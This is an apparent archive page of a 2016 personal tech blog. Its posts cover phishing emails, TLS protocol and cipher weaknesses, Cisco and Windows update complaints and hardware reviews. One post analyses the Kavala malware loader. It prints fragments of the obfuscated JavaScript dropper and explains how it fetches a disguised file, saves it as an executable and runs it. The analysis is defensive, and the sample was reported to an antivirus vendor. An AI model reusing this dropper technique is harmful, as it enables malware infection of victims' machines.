PayPal phishing: "we decided to temporarly suspend your account until further notice"
Wednesday, April 27. 2016
I don't know how they did it, but I received this e-mail into an e-mail address which I actually use for PayPal activity:
It reads:
Dear Customer ! Recentley we found suspicious activities on your account So we decided to temporarly suspend your account until further notice Please click link below and finish requred steps Click here to update your PayPal account Sincerely
The fake login site (obviously) doesn't have HTTPS enabled, or the address off http://www.verify-account-login2015centre.-removed-.com/verify-your-account-support/mpp/ doesn't have a single shread of trustworthiness in it. It looks like this:
The website of this login form is badly hacked/broken, the PHP-code on the other end gave only MySQL-error and didn't yield any useful information about it. In any case, I'd be ready to bet some serious money, the website once used to be a WordPress. The hacked sites always are.
Incoming e-mail originated from the same box. And to make sure I got the message, they sent me the same fraud twice. 
Also very typical for those phishing idiots. It would make the entire thing more believable if they didn't flood my box with the exact copy.
Of course I went to How do I report potential fraud to PayPal? to make sure PayPal gets a chance to shut that stupidity down.
TLS Security recap - HTTPS (in)security up until 2016
Friday, April 22. 2016
Past two years have been very interesting for anybody in the HTTPS / TLS scene. There have been couple of really serious security flaws and situation is changing constantly for all stakeholders: security researchers are finding these ever-so-critical flaws, software vendors and open-source projects keep updating their products and system administrators try to keep their software patches up-to-date. I guess that wheel of misfortune rolling is a good thing eventually, because the software will be better in the end. However, right now we're in the middle of turbulent Internet security world and that keeps everybody on their toes. Not cool.
Couple of years back I touched the subject in my post. There I was trying to figure out pretty much the same thing, is HTTPS, Mr. Hursti was making noise about SSL being broken. He obviously knew something, but he wouldn't or couldn't share any details. Today we know that he had it right.
Let's walk trough couple of scary-looking terms that in most conditions turn people away.
SSLv1
Encrypted HTTP or HTTPS was invented by Netscape back in 1993. This particular encryption protocol never saw public action and was soon superseded by SSLv2. This was never a standard accepted by others, it was just something Netscape put together in the early days of The Internet.
SSLv2
First ever encryption protocol used in HTTPS. This is what kept us secure between 1994 and 1996 when the design flaws were publicly annouced. There are quite a few of them.
Regardless of these known serious design flaws, there was almost no impact on usage of SSLv2. This is going to sound ridiculous, but lot of sofware run it enabled out-of-the-box for 15 years. For example, the popular Apache HTTPd had it enabled up until version 2.2.22 released in January of 2012. Of course anybody could manually go and disable it also between 1996 and 2012, but who really did? Nobody.
That's the stuff Mr. Scofield's claims of "Internet being broken" and "SSL being worth a post-it note on the NSA" (see my previous post about that).
SSLv3
This is the first serious attempt on securing the internet. Ever since end of 1995 till end of 2014 the protocol was sound. By that I mean by security community. There are claims that number of government-level organizations knew about the design flaws before that.
As all SSL-versions, this was something Netscape cooked in their labs. Rest of the world were lucky to have this, as Netscape released their specs and source code. Still, this is not a standard. This is what people in The Net commonly say: "SSL 3.0 is not a standard. Realistically, it is "what Netscape was doing at that time". When the protocol was turned into a standard, it became RFC 2246, aka "TLS 1.0"".
TLSv1
First ever standard proposed by IETF, the draft is back from 1996. At the time adoption was slow, everybody were using a prefectly good SSLv3 and there was no real need to start using something that was completely overlapping with that.
In 2014, after POODLE-flaw was expanded from SSLv3 to TLSv1, it meant the end of this (in)secure protocol.
TLSv1.1
First ever RFC 2246 back from 2002. Differences between TLSv1 are on the protocol itself and this version didn't introduce any new methods for encryption.
Also TLSv1.1 is suffering from POODLE and using this cannot be considered as secure.
As security adoption through The Net has been really slow, this is the most recent encryption protocol that can be considered as generally adopted by all client implementations roaming the wild-wild-net. Think of this: we're stuck to the year 2002!
TLSv1.2
At the time of writing this post, there are no known protocol design faults in TLSv1.2. This is the level everybody should be using.
The adoption for TLSv1.2 is quite wide, but enforcing it makes no sense for general public. At intranet use, this would make sense, but in the wild-wild-web, there is always some fool running Internet Explorer 6 and complaining, that "your site cannot be accessed".
This protocol, introduced back in 2006, brought a ton of really good encryption and hashing algorithms adding its usefulness. This is the stuff that makes Internet not broken and secure again!
TLSv1.3
This is something for the future. Not even the server running my blog supports this. When looking at the specs, it really doesn't make as big of a leap forward as TLSv1.2 did. It's just to polish and clarify the protocol.
Ciphers
This is the part where I have lost pretty much everybody. For a layman, reading about differences in protocols is as boring as it gets. But when talking about securing HTTP, having a non-flawed protocol is only half of the story. When a client connects the server (this applies to any encryption protocol, SSH, VPNs, etc.), the parties negotiate following details for the connection:
- Function: Key Exchange
- To keep the connection secure, client and server exchange encryption keys. These keys are used by the bulk cipher. Typically the idea is to keep the exchanged keys as secure and exchange them during connection to make eavesdropping as difficult as possible.
- Read more at: https://en.wikipedia.org/wiki/Key_exchange
- Algorithms: RSA, Diffie-Hellman, ECDH, SRP, PSK
- Function: Authentication
- The idea of authentication is to identify both parties at the time of creating a connection. This is optional. If you think about some of the most popular websites of used in The Net, they don't care about the identify of the connecting client. There are some use cases, where public access is restricted and only authenticated clients may connect.
- Read more at: https://en.wikipedia.org/wiki/Authentication
- Algorithms: RSA, DSA, ECDSA
- Function: Bulk Ciphers
- This is the "beef" of securing a connection. All the data transmitted between parties is encrypted with the purpose of keeping the transmission secure for everybody else.
- Read more at: IBM's knowledgecenter SSB23S
- Algorithms: RC4, 3DES, AES
- Function: Message Authentication
- To avoid any man-in-the-middle -attacks, it is beneficial for both parties to stamp all transmissions by a seal-of-authentication. This is necessary to keep away any third parties trying to tamper or inject any extra traffic into existing connection. This can be considered as "the other party is still the same guy we spoke earlier with and the message hasn't been altered in-transit".
- Read more at: https://en.wikipedia.org/wiki/Message_authentication_code
- Algorithms: HMAC-SHA256, HMAC-SHA1, HMAC-MD5
This quadruple is called a cipher suite or cipher for short. It can be used to describe the used algorithms in detail. Also note, that it is possible to run an "encrypted" connection without one or some of the functions. In quotes, because not having message authentication, or a bulk cipher at all is insane. It pretty much defeats the complete idea. Such ciphers do exist in the specification.
This issue of choosing a cipher suite for encrypted communication is vital and overlooked by uneducated sysadmins. Fact is, some ciphers are insecure by design and/or have serious implementation failures.
A complete list of all possible cipher suites is available at IANA web site: Transport Layer Security (TLS) Parameters. It has 326 ciphers defined and starts with the most insecure option there is:
"0x00,0x00",TLS_NULL_WITH_NULL_NULL
The line of 4 NULLs reads: no key exchange, no authentication, no bulk ciphering and no message authentication
Last one in the list is:
"0xCC,0xAE",TLS_RSA_PSK_WITH_CHACHA20_POLY1305_SHA256
That reads: RSA key exchange, pre-shared-key authentication, ChaCha20 Poly1305 bulk cipher, with SHA-256 message authentication
Cipher faults
The algorithm issues described below apply to all SSL and TLS protocol versions. You can be using TLSv1.3 and still be at risk of revealing your entire transmission to a listener.
Actually some attack vectors work by targeting a protocol design flaw to use a weaker cipher suite (for example POODLE), thus rendering the entire protocol useless. On the other hand: the attack can be mitigated by disabling any weak ciphers from the system. Sometimes that cannot be done or cannot be done reliably.
RC4 or Rivest Cipher 4 or Arcfour
Using RC4 as a bulk cipher algorithm is stupid, it is one of the oldest algorithms and it's weaknesses are public knowledge. For details, see the article Attack of the week: RC4 is kind of broken in TLS. The short version is, that it is possible to guess the encryption key by simply analyzing encrypted data. Surely the keys will be exchanged eventually, but any listener can guess the next key too.
CBC or Cipher Block Chaining
This is another block cipher. CBC itself isn't flawed. How it was implemented in SSLv3 and TLSv1 is. See article Security of CBC Ciphersuites in SSL/TLS: Problems and Countermeasures. The attack is quite complex, but it is there. If a 3rd party can alter the packets in transmission, eventually the used encryption key can be calculated from the responses for these packet manglings.
TLSv1.1 actuallyl fixed the flaw in the spec and implementation, but still ... it's game over for CBC. It's hard to find details why, but even the improved CBC3 on TLSv1.1 is flagged as being insecure. That is beyond me why.
SHA-1 or Secure Hash Algorithm 1
SHA-1 is used for message authentication. SHA-1 is the 160 bit version of SHA. The modern versions have 224, 256, 384 or 512 bits for increased security. The weakness of SHA-1 is described in articles When Will We See Collisions for SHA-1? and SHA1 Deprecation: What You Need to Know.
The problem here is, that if you'd have enough money, time and electricity, you could buy 10.000 PCs with super fast GPUs and simply brute force all the possibilities, it would be possible to create a hash collision with some data that would produce the same hash or with luck actually figure out what the original hashed data was. The possibility of somebody doing that is so likely, that this hashing algorithm cannot be trusted anymore. I guess we've learned something from the past?
Final thoughts
The situation isn't that bad. It used to be really bad. If you're one of those luddites running old operating system, old web browser, old cell phone, then you're doomed. Your toys are badly crippled and offer no serious security. You're too ignorant to care, also.
If your gear was released 2-3 years ago, then you're in a good place. Your stuff is configured to run in much smarter way, than the next guy's Windows XP with IE 6.
Technically the situation is bit more difficult. It is pretty much impossible for a Regular Joe, like your and me, to make a choice for the used cipher suite. Protocold dictates, that server is offering the capabilities and the strongest one is chosen. Good thing is that defaults in most commonly used software have improved. A lot, actually. Also lot of public awareness has been raised so, that admins check their settings. But ultimately, it is the system administrator who makes the final say if his/her server is configured to run safely or not.
While at it, I'd like to offer my seal-of-approval to Qualsys SSL Labs and their SSL test service located at https://www.ssllabs.com/ssltest/. That's my #1 weapon-of-choice when testing my server configs. The good thing about that service is, that it is accurate and free-of-charge. Thanks Qualsys for your great service!
Safe browsing to all!
Purpose of Git by The Man himself
Monday, April 11. 2016
Two facts: I'm not a fan of Git, actually I dislike it very much. The second one is: I use git daily in my line of work. The (almost) third one is, that I'm pretty much alone with my thoughts.
Steve Bennet shares some of my dislikement, his blog posting 10 things I hate about Git is one of my definite favorites. Actually I don't agree on every one of his points there. Especially #8 I kinda think as a good thing to have and do.
So, my opinion is, that pretty much nobody should be using Git. That being said, it's the #1 version control tool used widely by every single major organization producing any software at all. For example Microsoft is (or at least was) putting lot of development hours into libgit to make it suit their needs better. It would be impossible to land a software development job today without any skills with git. It's a de facto thing among my peers. Its not going anywhere, at least anytime soon.
The reason why IMHO almost nobody should be using Git is that it suits everyday work poorly. If your everyday work is developing Linux kernel, then you're excluded. The tool will suit your needs perfectly. The reason is revealed by author himself in TED February 2016.
Go see the interview here.
So, here goes:
The purpose of Git is "only created for me to maintain my first big project", aka. Linux kernel. It's not meant for me, it's not meant for small or medium or large organizations to use. Git was meant for Mr. Torvalds to use and help his project management. No wonder I find it unsuitable for my line of work.
Cisco Systems security upgrades - Breaking the paywall
Monday, April 4. 2016
I own an operate a Cisco ASA firewall. I have written about it couple of times, here and here to list two of them.
The unit I have is a second hand one, which I got out of an auction. At the time I got it, a list price with that lincense type and RAM was around 900 €. Today you can get one with less than $500 from Amazon.com. Today, the model has been EoLd by manufacturer. The price and unit size makes it's intended to be used by small businesses and satellite offices, so you don't expect much to begin with.
However, Cisco doesn't see it that way. They see it as big deal. Literally. To get any software/firmware upgrades, you'll need a Smartnet service contract. I don't know what else one will cover, but with a valid service contract it is possible to download latest software. That's flat out stupid and annoying. Not to mention the fact, that it really sucks having an unit for the purpose of providing security, but without security upgrades. Without any further rocket surgery, that's beyond stupid. But there I am. I don't have a security contract and I am running one.
A while back I was reading security advisory cisco-sa-20160210-asa-ike and I realized this:
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco Technical Assistance Center (TAC):
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.
Sure thing, I had to try. I sent an e-mail to Cisco TAC (that's short for Technical Assistance Center), explained the above case and asked for a firmware upgrade. After careful consideration and few follow-up questions later my Cisco account was awarded a right to download latest IOS and ASDM files. I installed them and rebooted. That's it.
There were couple of bonus hoops. Cisco's license for strong encryption software images is mighty good stuff. It's allowed to download such images only to Austria, Australia, Belgium, Canada, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Netherlands, New Zealand, Norway, Poland, Portugal, Slovakia, Slovenia, Spain, Sweden, Switzerland, United Kingdom and United States. Not a long list, that. Also, any person downloading the software must not be in any of the following lists: U.S. Department of Commerce's Table of Denial Orders, U.S. Department of Treasury, Office of Foreign Assets Controls (OFAC)'s Specially Designated Nationals List nor U.S. Department of State's Debarred List. I had to check, I'm not on any of those.
As final words: Cisco seems to have some level of responsibility going on there. Their primary approach is to squeeze money for security upgrades. That's pretty much what Microsoft does for Windows XP. What I cannot comprehend is why a company doing 48.000.000.000 USD in revenue and having over 100.000.000.000 USD in assets according to their Annual Report 2014 needs to charge me money for basic security updates. If somebody manufactures any software equipment that's for Internet access, there needs to be a simple and swift process of keeping the stuff secure. They even acquired IronPort, the company running SpamCop, my favorite and really effective way of blocking spam. Now they're asking donations to run SpamCop. Why don't they make it a paid service or just shut it down. Asking for people's donations is humiliating for a multi billion dollar corporation.
What Cisco is doing, that's just greed! Not cool. 
How to stop Windows 10 upgrade bullying - part 2
Tuesday, March 29. 2016
Those pushhy bastards at Microsoft really, really want to upgrade every Windows 7, 8 and 9 into a 10. (Yes, Windows 9 doesn't exist.) They even re-released KB3035583 to make sure that any previous blocking since March 2015 wouldn't be affected anymore. This is what my Windows 7 started doing:
This wasn't supposed to be happening. See details of Part 1. I downloaded latest version of GWX Control Panel, I think it is 1.7.3, but it showed nothing special:
There were some deleted Windows 10 files and a single process running, but I re-zapped them with GWX CP. That didn't make the KB3035583 disappear from the updates list.
A solution to make it gone was simpler than I originally thought:
Just selecting Hide update will make it stay gone. I guess MS-guys will be re-re-releasing it eventually, but for the time being, I'm happy with the result.
Ground Rules part 1: Contacting me
Friday, March 11. 2016
Dissecting W32/Kavala Malware loader
Thursday, February 25. 2016
My honeypots draw in all kinds of waste. Lately I've been getting lot of "invoices", Russian Rolex resellers and ball bearing ads from China along with the usual crap. I keep combing trough all that muck in case there are hidden pearls among them. Today there was.
This was actually my 2nd encounter with Kavala (the joke here is: word "kavala" in Finnish means "treachreous" or "wily"). This treacherous thing lures in via e-mail in a .zip-file, then you have to be stupid enough to try to open it, at which point it will execute some JavaScript-code to download and install a very nasty piece of rootkit into your Windows-box. While part of the bot-net, your trusty PC will be spewing out spam to innocent people like me. Totally un-cool.
So, here goes the story from beginning. I got his e-mail from Ukraine:
Subject: New payment for tax refund #00803769
X-PHP-Originating-Script: 1000:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
Date: Thu, 25 Feb 2016 07:01:36 +0000
From: "Internal Revenue Service"
You are receiving this notification because your tax refund request has been processed.
Please download attached copy of the wire transfer confirmation from the bank.
Transaction type : Tax Refund
Payment method : Wire transfer
Amount : $ 3095.00
Status : Processed
Form : 15613C
Additional information regarding tax refunds can be found on our website:
http://www.irs.gov/Refunds.
Regards,
Internal Revenue Service
Address: 1111 Constitution Avenue, NW
Washington, DC 20224
Website: http://www.irs.gov
Phone: 1-800-829-1040
Last time it was from "American Airlines", my tickets were in the e-mail. See details of that scam here.
The interesting part of that "IRS" tax refund e-mail was the attachment. It was a .zip-file containing a single file named Tax_Refund.doc.js.
Contents of the JavaScript-file is a single line of code and when wrapped, it goes something like this:
var a23= '555D545E0C0B1710090517100116240E05160D4A1011160F0D0 E5E17505E55505152575C575C51505E55',h46='it',c72='azo ',f82='eval',p66=' {',b45='reat',r72='p://',k50='"AD ',g4='ject(',e26='ody',j62='1"',z95='; br',m55='WScr ws.',q27='Scr',b6='io',p64=' { fo',j20=' (',v81='+n+ d',q39='.XM',c11='d(',g44='atch ',n66='Scri',c71='xa ',t57=' xo',t53='&rnd',d44='m")',l45='rea',e59='o.op c60='n =',q43='er) {',q48='ans.c',w34='; };',l60='en ,i92='atus ',w5='te-',y40='ar i=',o45='== 2',z54='; i',r70='if',i47=' { ',g0='; x',h88='im',l11='); i',u var',y74='eObje',b14=' x',q72='a.pos',x82='=60',m7=' 'tring',x0='var d',j73='ject(',r33='re',u7='n, ',m87 '3; n',h41=' tr',g72=t9+'b = '+b69+n19+'ux-p'+p83+'c '.r'+h42+'antr'+q48+'om".s'+t46+'it'+l36+'"); v'+q25 r59+' fn ='+x83+y15+'dEnvi'+'ronm'+l60+i49+'s('+'"%' s70+'0010'+j62+m46+t57+' = '+m55+'pt.C'+'reat'+n50+j 'ri'+q82+r33+'ateOb'+g4+k50+k8+p24+l45+d44+z54+'va'+
That's completely obfuscated crap. When beautified, it's still obfuscated crap:
q99 = ',2);',
l48 = '3; n',
h41 = ' tr',
g72 = t9 + 'b = ' + b69 + n19 + 'ux-p' + p8
o36 + h88 + 'e.co' + c95 + c72 + 'lk.
'antr' + q48 + 'om".s' + t46 + 'it' +
' W' + q27 + g49 + b45 + y74 + v36 +
r59 + ' fn =' + x83 + y15 + 'dEnvi' +
'TEMP' + h24 + k16 + 'trin' + 'g.fro'
'0010' + j62 + m46 + t57 + ' = ' + m5
m7 + q39 + 'LHTT' + 'P"' + w46 + 'var
r33 + 'ateOb' + g4 + k50 + k8 + p24 +
'd = ' + m60 + 'or (v' + 'ar n=' + '1
'r (v' + y40 + j38 + '<b.l' + 'engt'
'; try' + p66 + b14 + e59 + s38 + '("
']+"' + '/cou' + 'nter/' + '?id="' +
'"+' + u7 + 'fals' + u88 + '; x' + 'o
i92 + o45 + '00) ' + '{ x' + p20 + 'p
' xa' + '.wr' + m87 + 'e(xo' + '.resp
'a.si' + w41 + '1000)' + t21 + u60 +
'0; xa' + '.sa' + s51 + 'File' + j29
u54 + 'ws.Ru' + 'n(fn' + v81 + 'exe'
g44 + n48 + b56 + '}; };' + ' xa' + '
r70 + ' (d' + c60 + '= 1) ' + '{ l' +
'} ' + 'cat' + 'ch' + j20 + q43 + ' }
new Function(f82 + '(g72)')();
The good parts are what f82 and g72 contain. This is the obvious:
f82 = 'eval'
So, g72 contains all the nicely concatenated code in a single line. When beautified, it starts with following lines:
var ws = WScript.CreateObject("WScript.Shell");
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
Rest of the code was simply utilizing the newly created objects to go HTTP GET a "GIF-file" and save it into %TEMP% as an .exe. Finally, the code just executed all of them.
What every developer notices instantly is, that you cannot expect to use WScript in your code, unless you're running Internet Explorer or Edge as your browser. Still, that just limits possible victims. Most likely to just those ones who don't understand not to open the attachment.
There were three innocent sites around the net where the payload was loaded. It got all of them to confirm. Now that I had all the moving parts, I went to F-Secure website to submit my findings. The address is: https://www.f-secure.com/en/web/labs_global/submit-a-sample
I gave all the details and soon enough, there was an e-mail in my inbox from them:
They analyzed my findings and added it to their malware fingerprint database. I checked their most recent threats-list, and yes! I made it. There it was:
Lot of nasty and wily stuff floating around in the net. Be careful out there!
Logitech MX Anywhere 2 - Best mouse ever?
Sunday, February 14. 2016
Normally I wouldn't bother posting about a mouse, but this time I felt I had to. My previous laptop mouse broke. It was attached to one of the machines I use on daily basis and I worked perefectly for years. I don't know why the old Logitech simply refused to function no more. I did every trick I knew, but still no avail. I guess some cheap capacitor run out of its life there. So I had to go purhcase a new one.
In gaming (I do lot of FPS games), there is no substitute for a wired connection. But on a just surfin' or chatting lazily in the IRC, a wireless mouse does the trick more conveniently.
For those readers who are "whaaat! mouse? why would I want to use a mouse! so 90s!": I simply don't want to plough my finger on a plastic surface for hour every day. Not only my fingertips won't like it, but I find it just stupid. I've tried doing it, but trackpads aren't my thing. In fact I typically disable them, as me and many other touch typists like to rest my wrists exactly there where you other people love ploughing trough to simulate mouse movement. When I do that, mouse cursor starts wandering around when I'm typing. Not cool. So, no trackpads, but a real mouse. Actually, a pointing stick wedged between G, H and B -keys will work for me, but for example Apple doesn't do those for me.
There really aren't too many known manufcaturers in the mouse market anymore. Razer is in gaming business, and I already said, I wasn't going for a game mouse this time. You can make a choice between Logitech or somebody else whose name you either don't know or cannot pronounce. Logitech would like to move away from mouse business, but they are such a big player and making profit there, so I guess they really cannot do any sudden changes.
For a everyday use, Logitech has soooo many different models out there. Literally dozens and dozens. To narrow down my choices, I went immediately to the top-shelf material. Once I saw a wired USB-mouse being sold with 7,- € in a store. I had to get it, just for giggles. It was as much of a 7 euro mouse you can imagine. The worst part is the ridicouls leds making the thing glowing like a chrismas tree. So, no more el-cheapo crap.
When I realized, that there actually exists a rechargeable mouse, I had to go for it. The press release even had superlatives like "Logitech Introduces its Most Advanced Portable Mouse". Ok, they're boasting the thing is good, so they kinda reeled me in. I had to check how advanced or how super the mouse is. The price is around 80,- €, which was in my budget.
It looks like this:
On the outside, it looks like your regular Logitech mouse. I wasn't that impressed with that.
This is the part, that locked down the sale:
It is your regular Micro-A USB connector. Very popular in today's USB-things.
When flipping the rodent over, there are couple of new things, I haven't seen earlier in mice:
There is your O/I switch, a connect-button when your mouse needs a hint, that it should try harder making the connection. My experience about that is, that it does absolutely nothing. Then there is the "darkfield" sensor, which should work on any surface. And finally the new thing: a selector button. Since this beast can do both Bluetooth and Logitech's own wireless signals, you can choose between 3 devices which this thing can control. Actually, I would love to use that feature, but in my daily usage I need to switch between computers fast. Fast, as in, not wanting to flip my mouse over and keep clicking a button to make a choice between the computer I want to start using. On another type of usage scenario, that may be useful.
The pico-sensor is pretty much the same we've seen for many years already:
As I said, you don't necessarily need to use that. The mouse has bi-functionality in it, your Bluetooth connection will do fine.
My experience about this thing is: Wow! Amazing!
Yes, it is that good. The accuracy is there, ergonomic is there, the new Darklight sensor does exellent job on my desk. The thing is so slippery at the bottom, I didn't want to use my mouse mat anymore. Obviously, on the minus side, the thing is so slippery at the bottom it will just slip over the edge of my laptop when carrying it from a room to another. (I guess couple of drops later it will stop functioning, just like my previous one did.) The scroll roll has dual functionality, with friction or frictionless, which is cool. We've seen that in many mice before this. In general, the implementation of this excellent plan is just there. The general look and feel is so good, I might even get a second one.
I went to the support site and got some software for OS X:
You get to see the 500 mAh Li-po charge state and change all kinds of settings. No frills, plain functionality there.
In conclusion: They get this right. It is the best mouse I've seen this far!
Huawei E5577 quick test
Saturday, February 13. 2016
I had a chance to see what an E5577 is about. I don't own this, so I didn't break it apart. A Huawei E5577 is your run-of-the-mill Android-based 4G/3G/2G to Wi-Fi router. It even looks like a cell phone:
Huawei E5577 Specifications
Threre are some specs:
- LTE Category 4 Mobile Hotspot
- Freqencies supported:
- LTE: 2600/ 1800/ 800 MHz
- DC-HSPA+/ HSPA+/ UMTS: 2100/ 900 MHz
- GSM/ GPRS/ EDGE: 1900/ 1800/ 900/ 850 MHz
- Maximum transfer rates supported (DL = download, UL = upload):
- 4G LTE:
DL: 150 Mbit/s
UL: 50 Mbit/s - 3G Dual Carrier:
DL: 42 Mbit/s
UL: 5,76 Mbit/s - 3G HSDPA:
DL: 14,4 Mbit/s
UL: 5,76 Mbit/s
- 4G LTE:
- Standard 6-pin SIM card interface
- Format: Mini SIM
- Display: 1.45'' TFT LCD
- Startup time: 5s
- Dimensions: 96.8 mm x 58.0 mm x 17.3 mm
- Weight: 110g
- Micro SD Card slot
- Support external antenna: TS9 external antenna
- WiFi IEEE 802.11b/g/n
- Up to 10 users
IMEI info @ imei.info has:
- Model: E5577CS-321
- Brand: HUAWEI
- IMEI: TAC: 867262 FAC: 02
On the outside
Enough specs, let's look at the thing a bit closer. On the front, there is a small LCD-screen and a power button. On the bottom edge, there are couple of connectors:
Charger is (per Chinese standard) an USB-connector. Micro-a to be specific. Under the flip-cover, there are two TS9-connectors for optional external antennas. Two, as LTE MIMO requires.
On the top side of the router, there is a button:
That button is used with power-button (when power is already on), to navigate the screen menu:
Doing an even remote usable UI with two buttons only is ... stupid? impossible? ... erhm... difficult. But the obvious benefit is, that you can do at least some settings and see some information without logging into the thing. For non-Finnish readers, the menu says: Back (Takaisin), Device information (Laitteen tiedot) and Wi-Fi bandwidth (Wi-Fi kaista).
Normally, the screen has following status information:
In the inside
When back cover is popped, the thing looks like this under the hood:
The battery-pack is taking most of the space there. That's smart to put a 3 Ah Li-po battery for maximal usage time. When the battery is lifted, all the good stuff is visible:
On the top right corner, right next to the 4 battery pins, there is the SD-card slot. On an initial glance, it looks a lot like 2nd SIM-slot, but as you can see, there are 8 pins in a nice row. So, that's for SD-card. Below the empty SD-card slot, there is the 6-pin SIM -slot. It is already populated, as I was studying a router, which as actively used.
Web UI
Admin-interface is a Huawei classic http://192.168.8.1/
Since the WPA-password was clearly visible on the status screen, and this router is very easy to install to your home. Sales clerk had installed the SIM-card in the store, and at home you just kick the power on, and plug in the charger. That's very much a fire-and-forget thing. On my first login, I was greeted by:
Yes, the Huawei admin / admin -pair was in use there. Since, this wasn't mine, I didn't go change the password. Also the admin-console is only accessible from LAN-side, so it isn't that much of a security hole there.
In the main screen, very little surprises to anybody who has seen an E5186:
This unit was customized for TeliaSonera Finland and it has 3 languages to choose from: English, Swedish and Finnish.
Some firmware details:
The network settings were also exactly like an E5186:
At this point I was pretty sure, that an E5577 is just a miniature E5186.
The device details are:
As you can see, there are plenty of options to go change. I just didn't present all of them here. Very little interesting stuff there.
AJAX API
Since E5186 has a very good AJAX interface for the GUI, and this is just a miniature version of it. This had to have the same:
I even ran some queries just to test it:
/api/device/signal:
<pci>96</pci>
<sc></sc>
<cell_id>36657366</cell_id>
<rsrq>-7dB</rsrq>
<rsrp>-108dBm</rsrp>
<rssi>-79dBm</rssi>
<sinr>2dB</sinr>
<rscp></rscp>
<ecio></ecio>
<mode>7</mode>
Everything I threw at it returned exactly similar results, than E5186. Which of course is a very good thing.
Final words
This was a very pleasant exploration to a familiar device. I have really nothing negative to say about this router.
As I just pulled this from my article-queue, I had a chance to do some follow-up with the owner. She said, that it had been performing well and no issues had been encountered.
Earlier last year I was playing around with a ZTE MF910, which is a exact competitor for Huawei E5577. The MF910 isn't a robust box on a long run. Occasionally it loses the 4G-connection and requires some Tender/Love/Care to kick it back on-line. On my tests, it was an ok piece of plastic, but obviously non-computer users don't want to mess aroud with their hardware, they just want it to work when needed. The ZTE's box won't deliver on that.
Given a E5577 and MF910, having exactly the same price and all, my choice would be the Huawei.
Oracle Java download from command line
Friday, February 12. 2016
As Linux system administrator every once in a while you need to install something requiring Java. Open-source guys tend to gear towards OpenJDK, the GPL-licensed version of java. Still, java developers tend to write a lot of crappy code requiring a specific version of run-time-engine. So, you're in a desperate need of Oracle's java.
Now the Oracle people are very keen on you accepting their license before you can get your hands on their precious, leaky, JRE. At the same time all you have in front of you is a Bash-prompt and you're itching to go for a:
wget http://download.oracle.com/otn-pub/java/jdk/8u74-b02/jre-8u74-linux-x64.rpm
Yes. Everybody has tried that. No avail.
All you're going to get with that is a crappy HTML-page saying, that you haven't approved the license agreement and your request is unauthorized.
Darn!
But wait! There is a solution! All the Oracle is looking to see is a specific cookie oraclelicense set with a value accept-securebackup-cookie.
So, to leech the file into your box, you can do a:
wget --header='Cookie: oraclelicense=accept-securebackup-cookie' http://download.oracle.com/otn-pub/java/jdk/8u74-b02/jre-8u74-linux-x64.rpm
Ta daa! No you're rocking.
Apache mod_rewrite: Blocking unwated requests
Thursday, February 11. 2016
How to stop Windows 10 upgrade bullying
Sunday, February 7. 2016
The problem
Ok. Microsoft has amped up their "upgrade now" campaign to a ridiculous level.
First Microsoft Marketing chief Chris Capossela "warned" about Windows 7 being insecure. Warned in quotes because my initial reaction was: "Oh really!? Is it really possible, that a Windows can not be secure operating system."
While this machine is eligble for a free Win 10 upg, I just don't want to do that yet. I will upgrade eventually, but at the time I choose, not some ignorant corporate chose for me. So, Mr. Capossela explained that users who choose Windows 7 do so “at your own risk, at your own peril” and he revealed Microsoft has concerns about its future software and hardware compatibility, security and more.
Now the latest development is, that Windows 10 upg is a recommended update as they're now aggressively pushing Windows 10 upgrades. Meaning, that have to actively dodge it every time I'll upgrade this box of mine.
Further details about KB2952664 a Compatibility update for upgrading Windows 7 patch @ Softpedia article.
The information
The annoyance looks like this:
In the process list of the victim machine, there is a GWXUX.exe producing that. Actually there are other GWX-prefixed processes capturing your machine, but for the sake of this blog post I'm ignoring that crap.
Ages ago Microsoft release KB article ID 3080351, How to manage Windows 10 notification and upgrade options. It contains all kinds of useless information about modifying registry entries like HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade value ReservationsAllowed.
What the article doesn't mention is, that it also hijacks your disk space at C:\$Windows.~BT and C:\$Windows.~WS. I got a tip from an article and found 5 GiB of crap already loaded to my computer. I ran cmd.exe (with administrator credentials) to free up my SSD-space:
C:\Windows\system32>attrib -h "C:\$Windows.~BT"
C:\Windows\system32>attrib -h "C:\$Windows.~WS"
C:\Windows\system32>cd "C:\$Windows.~BT"
C:\$Windows.~BT>takeown /f . /R /D Y
C:\$Windows.~BT>icacls . /grant Administrators:(OI)(CI)F /T
C:\Windows\system32>cd "C:\$Windows.~WS"
C:\$Windows.~WS>takeown /f . /R /D Y
C:\$Windows.~WS>icacls . /grant Administrators:(OI)(CI)F /T
After doing all that, reading all the information, changing all the registry values and removing pre-loaded waste... It didn't work. What the article doesn't mention, that one of the GWX-processes runs in background and snoops those registry values and changes them back! Yes. You read it right. The fuckers go to your computer and make better choices for your registery. Their flawed reasoning is, that you obviously have to be some sort of moron not to go for their ultimate product right now, or preferably yesterday. And as you (the moron), the owner of your computer running a lesser "insecure" OS, need Microsoft's help to make better decisions.
OH, COME ON! Not cool.
I'm NOT upgrading to Windows 10 yet, because I (as in me) am in control here. Not Microsoft (as in them).
The solution
After spending countless hours and experiencing a number of setbacks, when the timers kicked on I stumbled into somebody having exactly the same problem as I do. He also had a solution for it. Here is the article Using GWX Control Panel to Permanently Remove the 'Get Windows 10' Icon.
GWX Control Panel looks like this:
With this application, no need to game of Whack-a-Mole anymore. The not wanted and not needed crap will just fly out with a click of a button. Example of getting rid of pre-loaded Windows 10 installation files:
Ultimately the cleaned up machine will report:
List of goodies include:
- Is 'Get Windows 10' icon app running? App not found
- Is 'Get Windows 10' icon app enabled? App not found
- Windows 10 Download folders found? No
Oh yes!
The application has an option to stay as a background process to keep monitoring, that evil Microsoft processes stay gone. I didn't test that, as just kicking all the crap out of my computer did the trick. Now I was back on the drivers' seat. Now I can decide when to do the upgrade.
Temperature measurement limits of La Crosse WS2357
Thursday, February 4. 2016
Guess what happens right before hell freezes over? Your weather station indicates dew point of 136 °C. Kinda funny.
